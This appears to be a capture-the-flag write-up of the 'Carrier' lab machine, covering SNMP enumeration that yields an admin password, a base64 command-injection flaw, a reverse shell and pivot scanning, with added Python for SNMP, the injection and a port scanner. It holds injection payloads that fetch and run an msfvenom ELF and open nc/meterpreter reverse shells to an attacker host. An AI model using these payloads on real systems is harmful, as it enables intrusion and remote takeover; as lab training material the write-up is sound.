scan

```
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux)
| ssh-hostkey:
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
```

gobuster -u http:

```
/img   (Status: 301)
/tools (Status: 301)
/doc   (Status: 301)
/css   (Status: 301)
/js    (Status: 301)
/fonts (Status: 301)
```
searchsploit lyghtspeed
google "lightspeed login exploit"
Login form test: `admin' or '1'='1` returns "Invalid username/password", so the obvious SQL injection does not work.
sqlmap -r 1.req
info http://10.10.10.105/doc/error_codes.pdf
45007  certificate invalid or expired
45009  system credentials have not been set
       Default admin user password has been set (see chassis serial number)
curl http://10.10.10.105/tools/remote.php → "License expired, exiting..."
nmap snmp scan

```
nmap -sU 10.10.10.105 -vv
67/udp  open|filtered dhcps  no-response
161/udp open          snmp   udp-response ttl 62
```

Reference: nmap-script-scan

locate *snmp*.nse

```
/usr/share/nmap/scripts/snmp-brute.nse
/usr/share/nmap/scripts/snmp-hh3c-logins.nse
/usr/share/nmap/scripts/snmp-info.nse
/usr/share/nmap/scripts/snmp-interfaces.nse
/usr/share/nmap/scripts/snmp-ios-config.nse
/usr/share/nmap/scripts/snmp-netstat.nse
/usr/share/nmap/scripts/snmp-processes.nse
/usr/share/nmap/scripts/snmp-sysdescr.nse
/usr/share/nmap/scripts/snmp-win32-services.nse
/usr/share/nmap/scripts/snmp-win32-shares.nse
/usr/share/nmap/scripts/snmp-win32-software.nse
/usr/share/nmap/scripts/snmp-win32-users.nse
```

```
nmap --script=snmp-info.nse 10.10.10.105 -sU -p 161
PORT    STATE SERVICE
161/udp open  snmp
| snmp-info:
|   enterprise: pysnmp
|   engineIDFormat: octets
|   engineIDData: 77656201e8e908
|   snmpEngineBoots: 2
|_  snmpEngineTime: 3d20h55m11s
```

```
nmap --script=snmp-brute.nse 10.10.10.105 -sU -p 161
PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute:
|_  public - Valid credentials
```

The "pysnmp" enterprise string says the agent is a Python pysnmp instance rather than a real network device, and the default community "public" being valid means the whole readable MIB view is open to anyone who can reach UDP/161.

```
nmap --script=snmp-processes.nse 10.10.10.105 -sU -p 161
nmap --script=snmp-netstat.nse 10.10.10.105 -sU -p 161
nmap --script=brute 10.10.10.105 -sU -p 161
nmap --script=snmp-hh3c-logins.nse 10.10.10.105 -sU -p 161
```
snmpwalk

MIB stands for Management Information Base: the tree of parameters a managed device (host, switch, router) exposes over SNMP, with every node addressed by an OID.

snmpwalk -h

snmpwalk -c public -v 1 10.10.10.105 (walk the tree from the default starting OID)

The OID that matters here is 1.3.6.1.2.1.47.1.1.1.1.11. The prefix 1.3.6.1.2.1 is mib-2, .47 is the ENTITY-MIB, and .1.1.1.1.11 is entPhysicalSerialNum, the chassis serial number that error code 45009 told us the default admin password is derived from. Net-SNMP prints the leading arc symbolically, so the same OID appears in the output as iso.3.6.1.2.1.47.1.1.1.1.11.
```
snmpwalk -v1 -c public 10.10.10.105 .3.6.1.2.1.47.1.1.1.1.11
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
End of MIB
```

-O OUTOPTS, n: print OIDs numerically

```
snmpwalk -v1 -On -c public 10.10.10.105
.1.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
End of MIB
```

snmpwalk -v1 -c public 10.10.10.105 1.3.6.1.2.1.47.1.1.1.1.11
snmpwalk -c public -v 1 10.10.10.105 system

```
snmpwalk -v2c -c public 10.10.10.105 .1.3.6.1.2.1.47.4.2.1.2
iso.3.6.1.2.1.47.4.2.1.2 = No more variables left in this MIB View (It is past the end of the MIB tree)
```

This was an attempt to pull the process list. The running-process table (hrSWRunName) lives in HOST-RESOURCES-MIB at 1.3.6.1.2.1.25.4.2.1.2, not under .47 (ENTITY-MIB), which is why the walk returns nothing; this agent only exposes the serial number anyway.
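What `snmpwalk -v1 -c public` actually puts on the wire, as an added example (this is not code from the writeup; the target address, community string and OID in the `__main__` block are the ones from the page and are assumptions to replace for your own lab). It builds an SNMPv1 GetRequest by hand with the standard library only, parses the GetResponse, and reads entPhysicalSerialNum, the ENTITY-MIB column the walk above returned. The point to notice is that the community string is a plain OCTET STRING in a cleartext BER message, so a guessable community such as public is the same thing as anonymous read access, which is the condition snmp-brute established. The code avoids f-strings so it also runs on the Python 3.5 found later on the pivot host.

```python
"""Minimal SNMPv1 GetRequest builder and GetResponse parser (added example, stdlib only)."""
import os
import socket

INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2
ENT_PHYSICAL_SERIAL_NUM = "1.3.6.1.2.1.47.1.1.1.1.11"   # ENTITY-MIB column the writeup walked


def ber_len(n):
    """Definite-length BER length field: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def encode_int(v):
    """Non-negative INTEGER: minimal big-endian bytes with the sign bit clear."""
    return tlv(INTEGER, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def encode_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(OID, bytes(out))


def build_message(pdu_tag, community, request_id, varbinds, error_status=0, error_index=0):
    """SNMPv1: SEQUENCE { version=0, community, PDU { reqid, errstat, errindex, SEQUENCE OF varbind } }."""
    vbl = b"".join(tlv(SEQUENCE, encode_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(error_status)
              + encode_int(error_index) + tlv(SEQUENCE, vbl))
    return tlv(SEQUENCE, encode_int(0) + tlv(OCTET_STRING, community.encode()) + pdu)


def build_get(community, oid, request_id):
    """GetRequest for one OID; the value slot is NULL in a request."""
    return build_message(GET_REQUEST, community, request_id, [(oid, tlv(NULL, b""))])


def ber_read(buf, pos=0):
    """Return (tag, payload, position just after this TLV)."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def decode_oid(payload):
    arcs, val = [payload[0] // 40, payload[0] % 40], 0
    for b in payload[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(str(a) for a in arcs)


def parse_response(pkt):
    """Return (request_id, error_status, community, [(oid, value_tag, value_bytes), ...])."""
    _, msg, _ = ber_read(pkt)
    _, _, p = ber_read(msg)                      # version
    _, community, p = ber_read(msg, p)           # community travels in cleartext
    tag, pdu, _ = ber_read(msg, p)
    if tag != GET_RESPONSE:
        raise ValueError("unexpected PDU tag 0x%02x" % tag)
    _, rid, p = ber_read(pdu)
    _, err, p = ber_read(pdu, p)
    _, _, p = ber_read(pdu, p)                   # error-index
    _, vbl, _ = ber_read(pdu, p)
    binds, p = [], 0
    while p < len(vbl):
        _, vb, p = ber_read(vbl, p)
        _, oid, q = ber_read(vb)
        vtag, val, _ = ber_read(vb, q)
        binds.append((decode_oid(oid), vtag, bytes(val)))
    return (int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big"), community.decode(), binds)


def snmp_get(host, community, oid, timeout=2.0):
    """Send one GetRequest to UDP/161 and return (error_status, varbinds) from the reply."""
    request_id = int.from_bytes(os.urandom(3), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_get(community, oid, request_id), (host, 161))
        data, _ = sock.recvfrom(65535)
    finally:
        sock.close()
    rid, err, _, binds = parse_response(data)
    if rid != request_id:
        raise ValueError("request-id mismatch")
    return err, binds


if __name__ == "__main__":
    # host, community and OID taken from the writeup (assumed); change them for your own lab
    print(snmp_get("10.10.10.105", "public", ENT_PHYSICAL_SERIAL_NUM))
```

The bytes `build_get` produces are the same ones tcpdump shows for `snmpget -v1 -c public <host> <oid>`; swapping `GET_REQUEST` for 0xA1 (GetNextRequest) and looping on the returned OID is all a walk adds.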
Log in with admin / NET_45JDX23. Capturing the session in Burp shows a POST request that executes a command on the server; the submitted value quagga is probably a username, so the feature presumably lists all processes owned by the given user. The parameter is base64-encoded, and a pipe appended to the username (root|command) runs an arbitrary command as the web server's user.
| raw | base64 | info |
| --- | --- | --- |
| quagga | cXVhZ2dh | |
| root | cm9vdAo= | |
| `root\|whoami` | xx | |
| `root\|cat /etc/passwd` | cm9vdHxjYXQgL2V0Yy9wYXNzd2Q= | |
| whereis nc | | /bin/nc; OpenBSD-flavoured nc, no -e option |
| `root\|/bin/nc -e /bin/bash 10.10.14.7 9900` | xx | |
| `root\|uname -a` | cm9vdHx1bmFtZSAtYQ== | |
| `root\|whereis wget` | xx | |
| pwd | xx | /root |
| cat /root/root.txt | xx | can't read root.txt |
| `root\|ls -al` | xx | |
| `root\|wget http://10.10.14.7/payload.elf;chmod +x payload.elf;./payload.elf` | | |
| `root\|cd /root;net -e /bin/bash 10.10.14.7 2233` | | |
```
msfvenom --platform Linux -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9900 -f elf -o payload.elf
python -m SimpleHTTPServer 80
root|wget http://10.10.14.7/payload.elf
handler -H 10.10.14.7 -P 9900 -p linux/x64/meterpreter/reverse_tcp
```

Getting a shell: through the web RCE, the msfvenom payload is fetched with wget, made executable and run, which gives a meterpreter session on the handler.
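The injection above, modelled in Python as an added example (not the target application's code). The server side is a hypothesis consistent with what the writeup observed: the parameter is base64-decoded and dropped into a shell command such as `ps -u <user>`, so the assumed command, the username regex and the function names are all mine. The block builds the `user|command` payloads from the table, shows the string-concatenation handler that makes them work, and puts the hardened equivalent next to it. One detail from the table worth seeing in code: cm9vdAo= decodes to "root\n" (an `echo root | base64` without -n), whereas the later payloads have no trailing newline.

```python
"""Base64 command-injection parameter from the Carrier writeup, modelled (added example)."""
import base64
import re
import subprocess

# hypothetical allow-list for the "username" value the feature expects
VALID_USER = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def encode_param(raw):
    """Encode exactly the bytes given (no trailing newline, unlike `echo x | base64`)."""
    return base64.b64encode(raw.encode()).decode()


def decode_param(b64):
    return base64.b64decode(b64).decode()


def build_injection(user, command):
    """The writeup's "user|command" trick, base64-encoded as the form expects."""
    return encode_param("%s|%s" % (user, command))


def vulnerable_handler(b64):
    """Hypothetical vulnerable server side: decoded value concatenated into a shell string."""
    cmd = "ps -u " + decode_param(b64)            # assumed command; "root|x" becomes "ps -u root|x"
    proc = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL)
    return proc.stdout.decode(errors="replace")


def hardened_argv(b64):
    """Hardened counterpart: validate the decoded value, then build an argv list (no shell)."""
    user = decode_param(b64).strip()
    if not VALID_USER.match(user):
        raise ValueError("rejected username: %r" % user)
    return ["ps", "-u", user]                      # run with subprocess.run(argv) in real code


if __name__ == "__main__":
    payload = build_injection("root", "echo INJECTED")
    print(payload, "->", repr(decode_param(payload)))
    print("vulnerable handler output:", vulnerable_handler(payload).strip())
    try:
        hardened_argv(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
```

`hardened_argv` returns the argv rather than executing it so the two handlers can be compared without a `ps` binary; the difference that matters is that the pipe never reaches a shell.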
info enum

```
find . -name "diag.php"
find: './dev/.lxd-mounts': Permission denied
find: './proc/tty/driver': Permission denied
find: './sys/kernel/debug': Permission denied
find: './sys/fs/pstore': Permission denied
find: './sys/fs/fuse/connections/49': Permission denied
find . -name ".ssh"
/home/ubuntu/.ssh/authorized_keys   (empty)
./root/.ssh
---
cd /root/.ssh
cat authorized_keys
netstat -an | grep 80
/usr/bin/python3.5 -c 'import pty; pty.spawn("/bin/bash")'
---
ping -c 4 10.10.10.105
traceroute 10.10.10.105   (command not found)
nc -nvz 10.10.10.105 1-100
Connection to 10.10.10.105 21 port [tcp/*] succeeded!
Connection to 10.10.10.105 22 port [tcp/*] succeeded!
ssh 10.10.10.105   (asks for a password)
```

The /dev/.lxd-mounts entry in the find output is a sign that this shell is inside an LXD container, which fits the separate internal addresses seen below.

info: /root/.ssh/authorized_keys contains keys for root@web and ppacket@carrier, so there are two more hosts. The current shell is root@r1; the next step is to go after the other two.
http://10.10.10.105/doc/diagram_for_tac.png
Gateway IP: 10.99.64.1
IPs of the target host: 10.99.64.2, 10.78.10.1, 10.78.11.1

```
root@r1:~# netstat -an | grep 22
tcp 0   0 0.0.0.0:22       0.0.0.0:*          LISTEN
tcp 0   0 10.99.64.2:22    10.99.64.251:42676 ESTABLISHED
tcp 0   0 10.99.64.2:22    10.99.64.251:48050 ESTABLISHED
tcp 0 192 10.99.64.2:51982 10.10.14.7:9900    ESTABLISHED
```

This shows the local address is 10.99.64.2 and that the reverse shell to 10.10.14.7:9900 originates from it; the two SSH sessions come from 10.99.64.251.

```
nc -nvz 10.99.64.251 1-100        → 22, 80 open
wget http://10.99.64.251          → confirms this internal IP is the same host as 10.10.10.105
---
ssh 10.99.64.251                  → Permission denied (publickey); login not allowed
ssh root@10.99.64.251
---
eth0 gateway
ping -c 4 10.99.64.1
nc -nvz 10.99.64.1 1-100
Connection to 10.99.64.1 21 port [tcp/*] succeeded!
Connection to 10.99.64.1 22 port [tcp/*] succeeded!
Connection to 10.99.64.1 53 port [tcp/*] succeeded!
ssh 10.99.64.1
ftp 10.99.64.1                    → anonymous login works, directory is /, no files, not writable
---
nc -nvz 10.78.10.2 1-100          → probably the eth1 segment gateway; 22 open
nc -nvz 10.78.11.2 1-100          → eth2 gateway; 22 open
ssh 10.78.10.2
ssh 10.78.11.2
```
ifconfig

```
eth0      Link encap:Ethernet  HWaddr 00:16:3e:d9:04:ea
          inet addr:10.99.64.2  Bcast:10.99.64.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fed9:4ea/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2581 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1982 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3241601 (3.2 MB)  TX bytes:295977 (295.9 KB)

eth1      Link encap:Ethernet  HWaddr 00:16:3e:8a:f2:4f
          inet addr:10.78.10.1  Bcast:10.78.10.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe8a:f24f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:223 errors:0 dropped:0 overruns:0 frame:0
          TX packets:198 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:16115 (16.1 KB)  TX bytes:14695 (14.6 KB)

eth2      Link encap:Ethernet  HWaddr 00:16:3e:20:98:df
          inet addr:10.78.11.1  Bcast:10.78.11.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe20:98df/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:231 errors:0 dropped:0 overruns:0 frame:0
          TX packets:183 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:16436 (16.4 KB)  TX bytes:13415 (13.4 KB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:196 errors:0 dropped:0 overruns:0 frame:0
          TX packets:196 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:15872 (15.8 KB)  TX bytes:15872 (15.8 KB)
```
route

```
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         10.99.64.1      0.0.0.0         UG    0      0        0 eth0
10.78.10.0      *               255.255.255.0   U     0      0        0 eth1
10.78.11.0      *               255.255.255.0   U     0      0        0 eth2
10.99.64.0      *               255.255.255.0   U     0      0        0 eth0
10.100.10.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.11.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.12.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.13.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.14.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.15.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.16.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.17.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.18.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.19.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.20.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.120.10.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.11.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.12.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.13.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.14.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.15.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.16.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.17.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.18.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.19.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.20.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
```

So r1 routes the 10.100.10-20.0/24 networks via 10.78.10.2 on eth1 and the 10.120.10-20.0/24 networks via 10.78.11.2 on eth2, which makes those two next hops the interesting targets.
Internal network scanning with Python: https://raw.githubusercontent.com/AnthraX1/InsightScan/master/scanner.py

wget http://10.10.14.7/scanner.py
/usr/bin/python3.5 scanner.py -h

The script is written for Python 2.7, which is not compatible with Python 3.5, and the target host only has Python 3.5, so it will not run there.
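A way around that constraint, as an added example (my code, not the InsightScan script and not part of the writeup): a TCP connect scanner that needs nothing but the standard library and syntax Python 3.5 accepts (no f-strings), so it can be fetched with wget exactly like scanner.py was and run with /usr/bin/python3.5 on the pivot host. It threads the connects so a /24 at a few ports finishes quickly, and includes a loopback self-check so it can be validated before pointing it at the 10.78.10.0/24 and 10.78.11.0/24 segments. Function names, flags and the default port range are mine.

```python
"""Pure-stdlib TCP connect scanner that runs on Python 3.5 (added example)."""
import argparse
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout):
    """Return (port, True) if a TCP connect to host:port succeeds, else (port, False)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        return port, sock.connect_ex((host, port)) == 0
    finally:
        sock.close()


def scan_ports(host, ports, timeout=0.5, workers=50):
    """Scan an iterable of ports concurrently; return a sorted list of those that accepted."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return sorted(port for port, is_open in results if is_open)


def parse_ports(spec):
    """Turn a spec like "22,80,1-100" into a sorted list of unique ports."""
    ports = set()
    for part in spec.split(","):
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.update(range(int(lo), int(hi) + 1))
        else:
            ports.add(int(part))
    return sorted(ports)


def self_test():
    """Listen on a random loopback port and confirm the scanner reports it, and only it, open."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    # grab a second ephemeral port and release it so it is (almost surely) closed
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    try:
        return scan_ports("127.0.0.1", [open_port, closed_port]) == [open_port]
    finally:
        listener.close()


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="TCP connect scan (Python 3.5 compatible)")
    ap.add_argument("host")
    ap.add_argument("-p", "--ports", default="1-1024", help='e.g. "22,80,1-100"')
    ap.add_argument("-t", "--timeout", type=float, default=0.5)
    args = ap.parse_args()
    for port in scan_ports(args.host, parse_ports(args.ports), args.timeout):
        print("%s:%d open" % (args.host, port))
```

Usage on the pivot would be `/usr/bin/python3.5 scan.py 10.78.10.2 -p 1-1024`; it is a connect scan, so every probe completes a handshake and is visible in the target's logs, which is the trade-off for needing no raw sockets or root.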
Next: upload a static nmap.

To be continued.